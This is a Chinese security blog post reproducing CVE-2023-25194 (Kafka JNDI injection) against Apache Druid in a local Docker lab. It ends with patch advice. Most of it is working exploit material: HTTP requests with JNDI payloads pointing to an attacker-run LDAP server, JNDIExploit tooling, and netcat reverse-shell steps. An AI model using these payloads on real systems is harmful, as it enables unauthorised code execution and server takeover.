2023-03-16
声明:本文分享的安全工具和项目均来源于网络,漏洞环境本地搭建,仅供安全研究与学习,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有高度可扩展、低延迟和高吞吐量的特点,广泛应用于实时监控、事件驱动分析、用户行为分析、网络安全等领域。通过使用Druid,企业和开发者可以快速获得实时分析结果,提升决策效率。
漏洞简介
在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。(其他使用Apache Kafka Connect的产品也可能受CVE-2023-25194漏洞影响)
0.19.0 <= Apache Druid <= 25.0.0
CVE-2023-25194
漏洞复现
安装环境-docker部署
用的github 的vulhub:
https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md
[[email protected] CVE-2023-25194]# docker-compose up -d
Starting cve202325194_web_1 ... done
[[email protected] CVE-2023-25194]#
http://your-ip:8888
即可查看到Apache Druid主页。POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: vps:8888
Content-Length: 1400
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://vps:8888
Referer: http://vps:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pZaf_2132_ulastactivity=050484OuqAxDqETcOja26QKgFkE4HbrlSk4NbAkGRg9oNLIbkCUN; pZaf_2132_nofavfid=1; pZaf_2132_smile=1D1; pZaf_2132_home_readfeed=1682214968; pZaf_2132_lastviewtime=1%7C1682215445; pZaf_2132_lastcheckfeed=1%7C1682217817; kOJf_2132_saltkey=MGWItu8r; kOJf_2132_lastvisit=1683339017; kOJf_2132_ulastactivity=27e4qsFumyqDRGo03vcLLEHChJmZRharD1jfbUJnU1NIIIrbB8UL; kOJf_2132_nofavfid=1; kOJf_2132_lastcheckfeed=1%7C1683342726; PHPSESSID=3543e022151ed94117e84216
Connection: close
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://nhagk5.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
[[email protected] JNDIExploit1.4]# java -jar JNDIExploit-1.4-SNAPSHOT.jar -i your vps ip
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 3456...
2.1命令执行:/touch shell.txt
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host:192.168.211.129:8888
Accept-Encoding: gzip, deflate
Accept: */*
cmd:ls
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1434
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.211.129:1389/Basic/Command/touch shell.txt\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
进入容器查看命令执行成功
docker exec -it 1e453483411a /bin/bash
getshell:
启用监听
nc-lvvp 8111
使用NDI-Injection-Exploit启动一个恶意的JNDI服务器:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反射shell命令(需要bash编码)" -A ip
反弹shell成功
修复建议
目前官方已有可更新版本,建议受影响用户升级至:Apache Kafka 3.4.0及以上版本。
暂时无法升级的用户可通过验证Kafka Connect连接器配置,仅允许受信任的JNDI配置来缓解此漏洞。
https://github.com/welk1n/JNDI-Injection-Exploit